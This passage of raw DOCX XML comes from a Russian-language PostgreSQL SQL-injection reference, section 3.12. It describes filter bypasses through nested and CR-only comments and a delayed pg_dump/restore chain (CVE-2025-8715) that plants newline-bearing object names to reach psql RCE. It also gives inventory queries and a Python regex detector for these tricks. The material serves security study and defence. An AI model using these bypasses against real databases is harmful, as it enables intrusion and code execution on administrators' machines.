          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules.py — server-side regex-валидатор на SQL-уровне. CVE-2025-8715 — client-side chain через pg_dump; обнаруживается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через инвентаризацию version-ов psql/libpq на DBA-машинах и audit existing object-names в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chr(10)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-substrings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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CVE-2025-8715</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R25.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CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — оригинальная уязвимость (исторический контекст регрессии).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GBHackers article: Critical PostgreSQL flaws August 2025</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий обзор фикс-релизов 17.6/16.10/15.14/14.19/13.22.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Lexical Structure — Identifiers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — quoted-identifier semantics.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pg_dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — backup-tool reference.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Docs: psql — meta-commands `\!`, `\copy`, `\connect`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chain-механика.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В категории 3.12 разобраны три класса edge-case-атак через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">парсер комментариев и обработку newline в идентификаторах PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это не «инъекции в классическом смысле», а тонкие отклонения PG-lexer от общесистемного SQL-поведения, которые создают gap-ы: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**3.12.1 Вложенные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 PG nested-aware (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xcdepth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-counter); большинство sanitizer-ов non-nested. Sanitizer-ы Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.sub(r'/\*.*?\*/', '', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non-greedy или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.DOTALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> greedy — оба дают разный view payload-а, чем PG. Три payload-карточки (обход non-greedy, обход greedy, log-stripper evasion).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3.12.2 `--` и CR/LF/CRLF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PG считает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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">независимо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> line-terminator-ами для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-комментария. Sanitizer, нормализующий только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или ищущий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как unit, пропускает одиночный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Один работающий payload (CR-only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один анти-паттерн (Unicode line-separator не работает против PG); один variant Payload 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3.12.3 Newline в идентификаторах (R25, CVE-2025-8715)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — second-order chain через pg_dump/restore. Атакующий создаёт role/table с newline в имени; pg_dump кладёт это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-комментарий dump-script-а; psql при restore видит ломанный комментарий → SQL injection / RCE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Регрессия CVE-2012-0868, patched в 17.6/16.10/15.14/14.19/13.22 (август 2025). Три payload-карточки (RCE через psql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SQL injection через pg_restore, COMMENT-payload в plpgsql-функции).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнение векторов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Уязвимая поверхность</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Тип атаки</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Когда активируется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Patch</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sanitizer/log-stripper non-nested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Input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Сразу при отправке payload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 (lexer behavior)</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sanitizer не учитывающий одиночный </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserv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Input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Сразу при отправке payload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 (lexer behavior)</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3.12.3 (R25)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pg_dump quoted-identifier handling</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Second-order chain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При restore (часы/дни позже)</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 16.10, 15.14, 14.19, 13.22 (август 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевое отличие 3.12.3 от 3.12.1/3.12.2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">временной gap между setup и активацией</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Setup может быть через legitimate операцию (CREATE ROLE для нового user-а), активация — через legitimate backup/restore процедуру. Detection требует audit на сторонах </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обеих</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> операций.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Типичная цепочка применения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">транспортные приёмы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не самостоятельные атаки. Сами по себе они не извлекают данные; они обеспечивают доставку payload-а через специфические pipeline-edge-cases:</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3.12.1 или 3.12.2 как обход input-фильтра</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий протаскивает SQL через sanitizer/WAF.</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3.1/3.6/3.7/3.10 как downstream-атака</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — после прохода через 3.12-обход, payload активирует UNION-leak, OOB, RCE или DML.</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3.12.3 как long-term persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий с минимальным CREATE-правом ставит «бомбу замедленного действия»: имя объекта с embedded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Активируется при следующем backup-restore-cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.3 особенно опасен тем, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">bypass-ит большинство runtime-защит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WAF не видит SQL atтак (нет HTTP-payload-а), audit-логи не показывают anomalous query (setup — обычный CREATE),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не записывает payload (нет execution). Detection — только на уровне inventory:</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rolname FROM pg_authid WHERE position(chr(10) IN rolname) &gt; 0 OR position(chr(13) IN rolname) &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — поиск newline-в-rolname.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relname FROM pg_class WHERE position(chr(10) IN relname) &gt; 0 OR position(chr(13) IN relname) &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — поиск newline-в-relname.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description FROM pg_description WHERE description ~ E'\n\\\\!'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — поиск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comment-ах объектов.</w:t>
      </w:r>
    </w:p>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 vs 3.12.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.12.2 может проталкивать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-разделённый payload, но stacked-queries-block extended-protocol-уровневый, не sanitizer-уровневый. 3.12 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parser-а, 3.5 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">wire-protocol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(Filter bypass) vs 3.12.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.9 — encoding tricks (hex, U&amp;, E-strings); 3.12 — lexer edge cases (nested comments, CR-only). Параллельные классы; часто комбинируются.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 vs 3.12.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.16 — server-side через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s', ...)</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3.12.3 — client-side через pg_dump-сериализацию. Разные точки в pipeline.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 PROGRAM) vs 3.12.3 Payload A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Оба дают RCE, но 3.7.1 — server-side, 3.12.3 — client-side (на DBA-машине через psql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rules.py — готовое правило для класса COMMENT_EDGE_CASE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный regex по 3.12.1 и 3.12.2. 3.12.3 не покрывается серверным rules.py (см. 3.12.3 — обнаруживается через inventory query, не через SQL-pattern-match).</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COMMENT_EDGE_CASE = "comment_edge_case"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VulnerabilityClass.COMMENT_EDGE_CASE: 7,</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"comment_nested": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.12.1 — вложенные block-комментарии (≥2 уровня)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"/\*[^*]*?/\*[^*]*?\*/[^*]*?\*/",</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"comment_cr_only": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.12.2 — одиночный \r после --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"--[^\r\n]*\r(?!\n)",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"comment_unbalanced_block": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.12.1 — несбалансированные /* и */ — индикатор атаки на парсер</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (сравниваем count(/*) vs count(*/) на уровне Python before regex)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:/\*[^*]*){3,}|(?:\*/[^/]*){3,}",</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if _RE["comment_nested"].search(sql):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vulnerability_class=VulnerabilityClass.COMMENT_EDGE_CASE,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=7,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос содержит вложенные /* /* */ */ комментарии. "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "PG обрабатывает их nested-aware (xcdepth counter); "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
